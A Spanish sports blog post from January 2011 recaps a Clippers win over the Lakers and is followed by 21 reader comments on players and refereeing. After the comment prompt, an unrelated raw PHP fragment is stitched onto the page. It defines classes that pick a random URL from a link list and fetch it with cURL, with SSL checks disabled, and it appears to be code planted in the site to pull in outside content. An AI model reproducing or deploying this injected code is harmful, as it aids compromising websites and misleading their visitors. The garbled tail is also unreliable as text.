La Crónica (16/01/2011)

17 de January de 2011 por TheDeerHunter

Derbi angelino. No debería ser noticia. No suele serlo. Pero anoche no hubo nada de buenrollismo, nada de condescendencia con el vecino pobre, ningún resultado conocido de antemano. Más bien todo lo contrario, como los derbis de aquí, como los de verdad. Griffin cambia el mundo.

Hace algunas semanas los Clippers ya estuvieron a punto de aprovechar el crónico estado de ensoñación en el que viven inmersos los campeones. San Fisher y su flor lo impidieron y parecía que los amarillos habían aprendido la lección, apretándole las clavijas al rookie desde el mismo salto inicial. Hasta Gasol sufrió problemas de faltas y terminó expulsado. Quién lo hubiera dicho. Sin mucho acierto en el tiro los Lakers tenían la situación bastante controlada al final del tercer cuarto. Pero con la bocina aún sonando Eric Gordon se cascó un triple imposible y fue entonces cuando saltó la liebre.

Baron Davis movía el balón como un demonio. Llovían los triples de Gordon, de Foye, del propio Davis. Griffin despertaba y el resto mordía atrás. La afición Clipper del Staples bramaba apoyando como si de una cancha turca se tratara. Está claro que los Lakers no esperaban la encerrona. Le pilló a contrapié a Gasol, que vió el final desde el banquillo; a Kobe y Fisher, que fallaron demasiadas; a Odom, que terminó hundiéndose y peleándose con el mundo; a Artest que tuvo que aparecer en la bronca del final.

Los Clippers tienen un objetivo y se matarán para defenderlo. Vemos a Baron Davis pelearse con el mundo en lugar de pasearse como una diva y ahí tienen alguna opción. Mientras los Lakers parece que obtienen sus objetivos por castigo… El baloncesto suele ser agradecido con quien mejor lo trata.

Mientras, en el Álamo, Popovic y los suyos observan atónitos cómo sus máximos rivales de conferencia les ceden alegremente la ventaja. Ellos dan pocas concesiones y darán aún menos conforme avance la campaña. Parker salió al paso de los rumores de traspaso con una actuación de MVP y mientras Melo anota 12 puntos… another time. Igual a los Lakers les parece buena idea jugarse un cruce en San Antonio. Por lo visto ya no se acuerdan de cómo se cuecen allí las habas.

MVP: Tony Paker le endosó 30 puntos, 7 rebotes y 4 asistencias a Chancey Billups y sus Nuggets. Eric Gordon se la lió a Kobe y los Lakers con 30 puntos, 6 asistencias y 2 rebotes.

El rookie: No será el mejor partido en la carrera de Blake Griffin, pero supo sobreponerse a una dura defensa en la primera parte y terminó siendo decisivo y desquiciando a sus rivales en la segunda. 18 puntos 15 rebotes que hubiera firmado cualquier jugador en un choque como el de ayer.

La sorpresa: Ver a Baron Davis encararse de esa forma con Lamar Odom dice mucho de la actitud que está tomando las últimas semanas. Y su equipo lo nota.

La decepción: Su situación no es fácil, pero si esto está siendo la despedida de Carmelo en Denver, qué “buen recuerdo” les quedará a sus aficionados. Obviamente es ironía.

El mayor esfuerzo en vano: Kobe hizo todo lo que se le puede pedir a alguien para ganar un partido. 27 puntos, 9 rebotes, 5 asistencias y 2 robos. Por una vez otro fue más letal que él. Bonito duelo con Eric Gordon.

Comenta

21 comentarios a esta entrada

  1. CAMPO2 dice:
    #1

    ¿Anthony = Carter? bajando númeos para que lo traspasen ya?

      Citar

  2. Lassad_Balon_de_Oro dice:
    #2

    Hola, os leo todos los días, aunque nuca antes había escrito.
    una pregunta, ¿no creeis que las estrellas de la NBA están sobrevaloradas?
    Veo partidos de Kobe, wade, y todas las estrellitas de la NBA y meten 30 puntos pero a base de tirar y tirar, fallando posesiones tras posesiones con a veces selecciones de tiro horribles.
    Mi opinion es que las estrellas están muy sobrevaloradas, siendo maquilladores de estadísticas, cualquier jugador de segunda fila si le diesen la oportunidad de tirar 25 tiros por partido, haría los mismos números que los Kobe, Durant, Wade….
    Por ejemplo, si miras la estadistica parece que Kobe ha hecho un buen partido (29-9-5), si ve el partido, ves que se ha comido los triples de Foye y Gordon por un tubo, que se ha tirado varias mandarinas desde más allá de los 7 metros, y que ha perdido un balón propio de un juvenil a 2 minutos del final que ha sentenciado el partido en favor de Lakers.
    Supongo que recibiré palos, pero es mi opinión.

      Citar

  3. Lassad_Balon_de_Oro dice:
    #3

    en favor de Clippers, perdón

      Citar

  4. sergio dice:
    #4

    Griffin es el rookie con mayor cantidad de dobles-dobles consecutivos desde Elvin Hayes. Kevin Love lleva el mismo numero que el segun creo… pero no es rookie. Dos bestias pardas los muchachos

      Citar

  5. Rompe dice:
    #5

    Love ahora mismo es el líder en dobles-dobles, con 36 en 41 partidos, el 88%… Griffin es segundo con 32 de 39, 82%. Por detrás vienen Howard y Randolph con 29 y 26, y Gasol quinto con 25.

      Citar

  6. Viva_Dirk dice:
    #6

    A mi no me gustó excesivamente el partido de Kobe, evidentemente fue el mejor de los Lakers, pero no jugó a su nivel, fue todo bastante individual cuando normalmente logra involucrar al resto.

      Citar

  7. nacho dice:
    #7

    Y esta noche LA supongo que sin Odom ni Artest. Mucho tiempo con Walton de 4. Son capaces hasta de ganar, y sobrados, ante Durant y Wesbrook. Si esto sucede, la asistencia de Phil a la psicóloga de Ron, es obligada. Mala pinta por el pacífico, a este paso ni a finales de conferencia. Y de los 42 partios, solo nueve contra equipos con record de victorias. Así se las ponían a Fernando VII, y el cabrón bien que nos crujió, pues haber si nos hace disfruar estos Lakers que esto es sano y no lo del borbón.

      Citar

  8. nacho dice:
    #8

    Perdón, a ver en vez de haber. Merezco la penitencia que toque, porque luego voy yo enmendando la plana a los demás.

      Citar

  9. TheDeerHunter dice:
    #9

    Hola Lassad… bienvenido al blog.
    La prueba de que no es como tú dices es clara este año. Miami ha fichado tres estrellas y automáticamente se ha puesto en la cabeza del Este. Ahora el personal de Cleveland tiene la oportunidad de tirarse los tiros que quiera. Jamison o Mo Williams, que no olvidemos llegaron a ser all-stars, se tiran los tiros que pueden y con los consecuentes porcentajes.
    Muchos son los llamados a tirarse los tiros que les dejen, pero pocos son los escogidos. A mayor cantidad de tiros en un partido peores son los porcentajes. Es casi matemático.
    Los que tienen tíos como Kobe optan a los anillos… y el resto mira y aprende.

    No estoy de acuerdo con lo que comentáis del partido de Kobe. Alguno de los triples que “se comió” eran indefendibles y la falta que comentas para mí tiene un punto de sospechosa. El partido estuvo lejos de estar en los parámetros que nos acostumbra el mejor jugador del mundo, pero sí fue mucho mejor que el de todos los demás que perdieron anoche.

      Citar

  10. GreenPride dice:
    #10

    Derbi que olia a pufo de partido alla por el tercer cuarto pero que se arreglo con un ultimo cuarto pleno de intensidad por parte de los Clippers. Los Lakers como muchas veces adolecieron de esa intensidad y dejaron que los Clippers remontaran y les comieran la tostada por ganas y acierto de algunos jugadores. La actitud de los Lakers debe cambiar pues solo han jugado 9 partidos contra equipos con record positivo de victorias y van a necesitar jugar a mejor nivel si quieren evitarse perder puestos y sufrir mucho en cancha contraria durante los playoffs. Dicho esto para mi siguen siendo favoritos en el Oeste claramente pero menos que al inicio de la temporada. Mal partido de Pau por cierto

      Citar

  11. HeiNeKeN dice:
    #11

    Alguien sabe el motivo de la expulsion de Griffin?? porque yo he visto el video en la pagina de la NBA y no hace absolutamente nada

      Citar

  12. TheDeerHunter dice:
    #12

    La de Griffin especialmente, pero también la de los demás. La tangana más light imposible y 4 expulsados. La NBA se está poniendo de fascistoide con ese tipo de temas que para qué.

    Un gran artículo de gonzalo vazquez hablando del tema (antiguo):
    http://blogs.acb.com/blog/elpuntog/post/el-ocaso-de-la-violencia

      Citar

  13. Jona dice:
    #13

    Por cierto ayer dijo daimiel qwue de los 40 y pico partidos de lakers solo 9 han sido ante equipos de record positivo y en esos nueve van 4-5 …… pinta que van para abajo ….

      Citar

  14. Sancho88 dice:
    #14

    Ahora que los Clippers tienen todo para progresar y que son el boom revolucionario guiados por Blake Griffin… comenzarán a cagarla. Su misión es defenestrar la división pacífico, junto a ilustres de la talla de Sacramento Kings y Golden State Warriors. Y mira, que mola como juegan, con sus rookies y to la pesca y que si vuelve Kaman van a molar mucho mas, pero… para mi son como el Atleti, sinceramente. Siempre aspirando a todo pero al final les puede ser el club pequeño de la ciudad. Mis perdones a los colchoneros por la comparación (está reciente lo del jueves).

      Citar

  15. -=TheKing=- dice:
    #15

    Yo creo que el partido de los clippers no ha sido para tanto, ahora an dominado el rebote entre Griffin y Deandrejordan.

    Para Lassad, es verdad que los cracks se juegan muchos tiros y aveces con malos porcentajes, pero mejor que lo hagan ellos que cualquier otro jugador del equipo, ya que fallara = o más.

    Quien prefieres que se juegue tus lanzamientos a jugada personal Kobe o Artest, el problema de estos equipos y de cualquier equipo es que en momentos del partido juegan de forma muy individualista, pero creo que es la cultura NBA.
    Es sólo una opinión sin ánimo de joder anadie salu2 🙂

      Citar

  16. sergio dice:
    #16

    Rompe… me referia a numero de dobles-dobles consecutivos. Juraria que Love y Griffin llevan el mismo numero, uno arriba uno abajo.

      Citar

  17. Rompe dice:
    #17

    Cierto Sergio, me comí el “consecutivos” xD. Pues sí, creo que llevan más o menos los mismos. Y menudo último cuarto que se marcó el chaval ayer! Porque a mediados del tercer cuarto creo que llevaba 1/10 y 5 rebotes o así…

      Citar

  18. Denise dice:
    #18

    Vaya nivel más soft de arbitraje. En la NHL se matan a tortas hasta que uno cae al suelo ante la pasividad de los arbitros, y aquí, ya mismo no se va a poder ni intimidar al rival con una falta dura.

      Citar

  19. Sancho88 dice:
    #19

    Denise, si tienes un rato leete este artículo que escribió Gonzalo Vazquez sobre lo “susceptible” que se ha vuelto la liga en torno a la violencia, los arbitrajes y todo eso. Se supone que en la época de Bird se pegaban hasta en el carnet de identidad y ahora está claro que todo ha cambiado y se pita falta antideportiva hasta por ser el último defensor o por hacer una falta al jugador que penetra después de que ya se haya pitado falta… vamos, un poco un cachondeo. yo que soy árbitro de basket a veces me da verguenza tener que pitar ese tipo de cosas. Alguna vez que ha pasado lo del último hombre y yo he pitado falta normal porque el último año ya añadieron una cláusula al reglamento diciendo que a pesar de ser el útlimo hombre se juzga la intencionalidad del contacto para pitar antideportiva. Aunque en la NBA aún son mas permisivos que aquí con el sistema de faltas flagrantes y tal, que ya sabes que no hay quien lo entienda, con partidos de suspension a partir de la cuarta o quinta falta de ese tipo… en fin, lo que tu dices, en cuestion de reglamento se han vuelto bastante nenazas en la NBA.

    De todas formas, estuvo muy guapo el pique ahi entre Davis y Odom cara a cara, que Davis guardaba debajo de su barba el puño de chuck norris pero no se lo dejaron sacar, jeje.

    Esos detalles de agresividad le dan a la liga chispa joder, que hay partidos en los que los jugadores no se tocan y son todo aclarados y tíos penetrando sin oposicion hasta la cocina.

    http://217-116-27-170.redes.acens.net/blog/elpuntog/post/el-ocaso-de-la-violencia

      Citar

  20. Denise dice:
    #20

    Pues si tienes razón, Un poco de pique y de cera es bueno, es simbolo de que los jugadores tienen ganas de ganar y no estamos jugando a una pachanga de verano. Creo que ya se pita técnica hasta por tocar un poco el balón una vez que entra en el aro para evitar que el rival saque rapido.
    pero en todos los deportes de contacto pasa igual. Por ejemplo en futbol, a Maradona le daban cera de la buena, y ahora en cambio a Messi y a CR9 ni se les puede tocar. Aún recuerdo la crucifixión del pobre Ujfalusi.

      Citar

  21. Denise dice:
    #21

    Cuidado con Griffin que lleva en estos momentos 36 puntos y aun queda un cuarto. Si se las chupa, podría llegar a 50 puntos.
    Ya teneis el MVP para la cronica de mañana.
    Y los Raptors han perdido de 4 al final.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>